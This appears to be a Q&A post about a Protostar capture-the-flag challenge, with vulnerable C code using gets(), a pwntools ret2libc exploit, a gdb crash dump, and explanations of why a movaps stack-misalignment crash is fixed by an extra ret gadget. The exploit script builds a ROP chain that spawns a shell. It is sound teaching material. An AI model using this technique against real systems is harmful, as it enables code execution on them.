Segfault in ret2libc attack, but not with a hard-coded system call

Tags: c, segmentation-fault, ctf

I have the following Protostar challenge:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

/* BUFFSIZE is not defined in the posted source; 64 is an assumed value */
#define BUFFSIZE 64

void getpath()
{
  char buffer[BUFFSIZE];
  char flagBuffer[64];
  FILE *fp;
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xff000000) == 0xff000000) {
    printf("bzzzt (%p)\n", ret);
    _exit(1);
  }

  printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{

  getpath();

}
I'm using pwntools to build my exploit. This is my exploit.py file:

from pwn import *

exe = './stack5'

context.clear(arch='amd64')
context.kernel = 'amd64'

system_addr = 0x7ffff7a33440
exit_addr = 0x7ffff7a27120
binsh_addr = 0x7ffff7b97e9a

binary = ELF(exe)
binary.symbols = {'system': system_addr, 'exit': exit_addr}

rop = ROP(binary)
rop.system(binsh_addr)
rop.exit()
print(rop.dump())
payload = cyclic(128)
p = process([exe])
p.sendline(payload)
p.wait()
# Get the core dump and locate the offset of the saved return address
core = Coredump('./core')
print(cyclic_find(pack(core.fault_addr)))
payload = flat({cyclic_find(pack(core.fault_addr)): rop.chain()})
p = binary.process()
p.recv()
p.sendline(payload)
p.interactive()
This results in a segfault. After saving the payload to a txt file and running it under gdb, I found that the segfault happens in do_system:

input path please: got path aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaa#@
[New process 23199]

Thread 2.1 "stack5" received signal SIGSEGV, Segmentation fault.
[Switching to process 23199]
[----------------------------------registers-----------------------------------]
RAX: 0x7ffff7b97e97 --> 0x2f6e69622f00632d ('-c')
RBX: 0x0
RCX: 0x7ffff7b97e9f --> 0x2074697865006873 ('sh')
RDX: 0x0
RSI: 0x7ffff7dd16a0 --> 0x0
RDI: 0x2
RBP: 0x7fffffffe1d8 --> 0x0
RSP: 0x7fffffffe178 --> 0x7ffff7a48f26 (<__printf+166>: mov    rcx,QWORD PTR [rsp+0x18])
RIP: 0x7ffff7a332f6 (<do_system+1094>:  movaps XMMWORD PTR [rsp+0x40],xmm0)
R8 : 0x7ffff7dd1600 --> 0x0
R9 : 0x4f ('O')
R10: 0x8
R11: 0x246
R12: 0x7ffff7b97e9a --> 0x68732f6e69622f ('/bin/sh')
R13: 0x7fffffffe3f0 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7ffff7a332e6 <do_system+1078>: movq   xmm0,QWORD PTR [rsp+0x8]
   0x7ffff7a332ec <do_system+1084>: mov    QWORD PTR [rsp+0x8],rax
   0x7ffff7a332f1 <do_system+1089>: movhps xmm0,QWORD PTR [rsp+0x8]
=> 0x7ffff7a332f6 <do_system+1094>: movaps XMMWORD PTR [rsp+0x40],xmm0
   0x7ffff7a332fb <do_system+1099>: call   0x7ffff7a23110 <__GI___sigaction>
   0x7ffff7a33300 <do_system+1104>: lea    rsi,[rip+0x39e2f9]        # 0x7ffff7dd1600 <quit>
   0x7ffff7a33307 <do_system+1111>: xor    edx,edx
   0x7ffff7a33309 <do_system+1113>: mov    edi,0x3
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe178 --> 0x7ffff7a48f26 (<__printf+166>:    mov    rcx,QWORD PTR [rsp+0x18])
0008| 0x7fffffffe180 --> 0x7ffff7b97e97 --> 0x2f6e69622f00632d ('-c')
0016| 0x7fffffffe188 --> 0x7fffffffe260 --> 0x10000
0024| 0x7fffffffe190 --> 0xffffe1a0
0032| 0x7fffffffe198 --> 0x7ffff7a33360 (<cancel_handler>:  push   rbx)
0040| 0x7fffffffe1a0 --> 0x7fffffffe194 --> 0xf7a3336000000000
0048| 0x7fffffffe1a8 --> 0x7fffffffe2a0 --> 0x0
0056| 0x7fffffffe1b0 --> 0x7ffff7dd18d0 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007ffff7a332f6 in do_system (line=0x7ffff7b97e9a "/bin/sh") at ../sysdeps/posix/system.c:125
125 ../sysdeps/posix/system.c: No such file or directory.

What is confusing is that when I add a call to system("/bin/sh") in the C code, the call works and I pop a shell, but when I call system through the ret2libc attack, it segfaults.

After searching for the instruction movaps segfault, I came across this:

MOVAPS issue

If you're using Ubuntu 18.04 and segfaulting on a movaps instruction in buffered_vfprintf() or do_system() in the 64-bit challenges, then ensure the stack is 16-byte aligned before returning to GLIBC functions such as printf() and system(). The version of GLIBC packaged with Ubuntu 18.04 uses movaps instructions to move data onto the stack in some functions. The 64-bit calling convention requires the stack to be 16-byte aligned before a call instruction, but this is easily violated during ROP chain execution, causing all further calls from that function to be made with a misaligned stack. movaps triggers a general protection fault when operating on unaligned data, so try padding your ROP chain with an extra ret before returning into a function, or return further into a function to skip a push instruction.


Simply adding a call to a ret gadget before calling system aligned the bytes, and a shell popped.

Can you explain why adding a simple ret gives stack alignment?

@kayochin: Because 16 = 2*8, RSP is either aligned or one pop away from 16-byte alignment. If you had this problem in the first place, then at the end of your gadget chain RSP%16 == 0 at entry to the function you wanted. (Unlike RSP%16 == 8, which the ABI requires when a call runs with RSP aligned.) Extending the payload to go through one more ret adjusts the final RSP by 8, satisfying the ABI requirement. (Unless one of your gadgets does something crazy like add rsp, 2 or popw %ax to fully misalign RSP.)
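The alignment arithmetic from the quoted ROP Emporium note and the comment above, as an added model that is not code from the question, from ROP Emporium or from pwntools: it takes the RSP value and the movaps displacement from the gdb dump and reports whether the store faults, and it walks a gadget chain to see whether the target function is entered with RSP % 16 == 8 as the ABI expects. The gadget table and the stack base value 0x7fffffffe168 are constructed for illustration.

```python
# Model of the x86-64 stack-alignment rule behind the movaps crash.
# Each ret pops one qword (RSP += 8); a "pop reg; ret" gadget pops two.
# The SysV ABI wants RSP % 16 == 0 right before a call, so a function
# reached by a real call sees RSP % 16 == 8 at its first instruction.
# A ROP chain reaches the target through ret instead, so the number of
# qwords consumed before the target's address decides the alignment.

# Gadget shapes assumed for illustration: qwords each one removes from the stack.
GADGET_QWORDS = {
    "ret": 1,                      # pops only the next return address
    "pop rdi; ret": 2,             # pops the argument, then the return address
    "pop rsi; pop r15; ret": 3,    # two registers, then the return address
}


def rsp_at_entry(rsp_at_overflowed_ret, chain):
    """RSP at the first instruction of the target function.

    rsp_at_overflowed_ret: RSP while the vulnerable function's own ret
    executes, i.e. the address of the first attacker-controlled qword.
    chain: gadget names, in order, placed before the target's address.
    """
    rsp = rsp_at_overflowed_ret
    for gadget in chain:
        rsp += 8 * GADGET_QWORDS[gadget]
    return rsp + 8  # the last ret pops the target's address itself


def entry_is_abi_aligned(rsp):
    """True when the callee sees the alignment a real call would give it."""
    return rsp % 16 == 8


def movaps_would_fault(rsp_at_fault, disp):
    """movaps XMMWORD PTR [rsp+disp] raises #GP unless the address is 16-aligned."""
    return (rsp_at_fault + disp) % 16 != 0


def pad_chain(rsp_at_overflowed_ret, chain):
    """Prepend one lone ret when that is what restores the ABI alignment."""
    if entry_is_abi_aligned(rsp_at_entry(rsp_at_overflowed_ret, chain)):
        return list(chain)
    return ["ret"] + list(chain)


if __name__ == "__main__":
    # RSP and displacement taken from the gdb dump in the question.
    print(movaps_would_fault(0x7FFFFFFFE178, 0x40))        # True
    # Constructed stack base that is 8 mod 16, like the failing run.
    print(pad_chain(0x7FFFFFFFE168, ["pop rdi; ret"]))    # ['ret', 'pop rdi; ret']
```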